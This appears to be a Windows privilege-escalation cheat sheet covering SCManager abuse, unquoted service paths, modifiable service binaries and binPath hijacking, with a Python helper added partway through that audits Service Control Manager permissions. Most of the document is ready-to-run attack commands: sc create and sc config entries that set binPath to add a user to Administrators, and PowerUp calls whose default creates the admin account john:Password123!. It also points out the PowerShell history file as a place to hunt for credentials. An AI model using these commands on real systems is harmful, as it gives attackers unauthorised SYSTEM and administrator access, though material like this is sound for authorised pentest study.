Windows Priv Esc

Tools

PowerUp: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

BeRoot: https://github.com/AlessandroZ/BeRoot

Privesc: https://github.com/enjoiz/Privesc

WinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

SCManager Abuse

Most enumeration tools do not check this, so remember to check it manually. Full writeup at https://recipeforroot.com/scmanger/

# show who may create services: dump the security descriptor (SDDL) of the Service Control Manager
cmd /c sc sdshow scmanager

This prints the SDDL of the Service Control Manager. A low-privileged principal can be granted service-creation rights here.
SDDL syntax reference: https://itconnect.uw.edu/wares/msinf/other-help/understanding-sddl-syntax/

# create a service that runs as SYSTEM from a low-privileged user (USER = the account to elevate)
sc create MyService displayName= "MyService" binPath= "C:\Windows\System32\net.exe localgroup Administrators USER /add" start= auto

# reboot (start= auto runs the service at boot) and USER is in Administrators
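An added audit helper, not part of this page or of any tool listed above: it parses the DACL of the SDDL string that sc sdshow scmanager prints and reports which principals hold SC_MANAGER_CREATE_SERVICE (the DC right, 0x0002, or a generic/all-access right that includes it), then flags broad aliases such as Authenticated Users (AU). The embedded SDDL strings are constructed samples; paste a host's real output to check it before and after hardening.

```python
import re

# SDDL rights tokens -> access-mask bits (from Microsoft's SDDL documentation).
RIGHTS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "KA": 0xF003F, "KR": 0x20019, "KW": 0x20006, "KX": 0x20019,
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
}
SC_MANAGER_CREATE_SERVICE = 0x0002          # on the SCM object, "DC" is this bit
GENERIC_INCLUDES_CREATE = RIGHTS["GA"] | RIGHTS["GW"]  # SCM maps GENERIC_WRITE onto CREATE_SERVICE
BROAD_PRINCIPALS = {"AU", "BU", "WD", "IU", "AC", "DU", "BG"}  # "any user" aliases
ACE_RE = re.compile(r"\(([^)]*)\)")

# Constructed samples: a default-looking SCM descriptor and one weakened for AU.
DEFAULT_LIKE = ("D:(A;;CC;;;AU)(A;;CCLCRPRC;;;IU)(A;;CCLCRPRC;;;SU)"
                "(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)(A;;CC;;;AC)S:(AU;FA;KA;;;WD)")
WEAK_SAMPLE = "D:(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)"

def access_mask(rights_field):
    """Convert an SDDL rights field (two-letter codes or a 0x hex value) to a mask."""
    if rights_field.lower().startswith("0x"):
        return int(rights_field, 16)
    return sum(RIGHTS[rights_field[i:i + 2]] for i in range(0, len(rights_field), 2))

def principals_who_can_create_services(sddl):
    """SID aliases granted service creation by Allow ACEs in the DACL (deny ACEs ignored)."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # keep the DACL, drop the SACL
    granted = []
    for ace in ACE_RE.findall(dacl):
        fields = ace.split(";")                      # type;flags;rights;objguid;inhguid;sid
        ace_type, rights, sid = fields[0], fields[2], fields[5]
        if ace_type == "A" and access_mask(rights) & (SC_MANAGER_CREATE_SERVICE | GENERIC_INCLUDES_CREATE):
            granted.append(sid)
    return granted

def weak_principals(sddl):
    """Broad, low-privileged aliases that can create services: the finding to fix."""
    return [p for p in principals_who_can_create_services(sddl) if p in BROAD_PRINCIPALS]

if __name__ == "__main__":
    for label, sddl in (("default-like", DEFAULT_LIKE), ("weak", WEAK_SAMPLE)):
        print(label, "can create services:", principals_who_can_create_services(sddl),
              "weak:", weak_principals(sddl))
```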

Unquoted Service Paths

Write-ServiceBinary takes a pre-compiled C# service binary and patches in the commands needed for service abuse. If -UserName/-Password or -Credential is specified, the patched-in command creates a local user and adds it to the specified -LocalGroup; otherwise the specified -Command is patched in. The binary is then written out to the specified -ServicePath. Either -Name must be specified for the service, or a proper object from Get-Service must be passed on the pipeline, so that the service name the binary will run under can be patched in.

# Enumeration
Invoke-AllChecks
Get-ServiceUnquoted

# Abuse
# default payload adds the local user john:Password123! to Administrators
Write-ServiceBinary -Name 'service' -ServicePath <HijackPath>
Write-ServiceBinary -Name 'service' -ServicePath C:\WebServer\Abyss.exe -Command "net localgroup Administrators user /add"

# Restart Service (cmd)
sc stop service
sc start service

Modify Service Executable

Replaces the service binary for the specified service with one that executes a specified command as SYSTEM.

Takes a service Name or a ServiceProcess.ServiceController on the pipeline where the current user can modify the service binary listed in the binPath. Backs up the original service binary to "OriginalService.exe.bak" in the service binary's location, then uses Write-ServiceBinary to create a C# service binary that either adds a local administrator user or executes a custom command. The new service binary replaces the original at the original service binary path, and a custom object is returned that captures the original and new service binary configuration.

# Enumeration
Invoke-AllChecks
Get-ModifiableServiceFile

# Abuse
# default payload adds the local user john:Password123! to Administrators
Install-ServiceBinary -Name 'service'
Install-ServiceBinary -Name 'service' -Command "net localgroup Administrators user /add"

# Manual
Write-ServiceBinary -Name 'service' -Command "command" -ServicePath "C:\service\write.exe"

# Restart Service (cmd)
sc stop service
sc start service

# Cleanup
Restore-ServiceBinary -Name service -BackupPath 'C:\temp\backup.exe'

Modify Service BinPath

Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current user has configuration-modification rights on, and runs a series of automated actions to execute commands as SYSTEM. First, the service is enabled if it was disabled, and the original service binary path and configuration state are preserved. Then the service is stopped and the Set-ServiceBinPath function is used to point the service binary (binPath) at a series of commands: the service is started, stopped, and the next command is configured. After completion, the original service configuration is restored and a custom object is returned that captures the service abused and the commands run.

# Enumeration
Invoke-AllChecks
Get-ModifiableService

# Abuse
# default payload creates the local admin john:Password123!
Invoke-ServiceAbuse -Name 'service'
Invoke-ServiceAbuse -Name 'service' -Command "net localgroup Administrators user /add"

# Manual

sc config "servicename" binPath= "cmd.exe /c net localgroup administrators user /add"
sc stop "servicename"
sc start "servicename"

Interesting Files

Command History in PowerShell 5.0

By default, PowerShell on Windows 10 (through the PSReadLine module) keeps the last 4096 commands in a plain-text file in each user's profile: %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
